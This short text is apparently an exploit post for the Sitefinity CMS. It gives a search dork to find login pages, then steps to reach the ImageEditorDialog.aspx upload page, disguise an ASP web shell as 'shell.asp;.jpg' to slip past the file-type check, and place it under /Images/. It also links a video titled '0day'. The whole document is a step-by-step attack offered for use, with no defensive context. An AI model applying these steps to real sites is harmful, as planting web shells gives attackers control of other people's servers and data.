dork : "Sitefinity: Login"
exploit # /UserControls/Dialogs/ImageEditorDialog.aspx first go to # http://site.com/sitefinity/
then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
Upload to # http://site.com/Images/[shell] Video : http://net-edit0r.persiangig.com/Film/0day.rar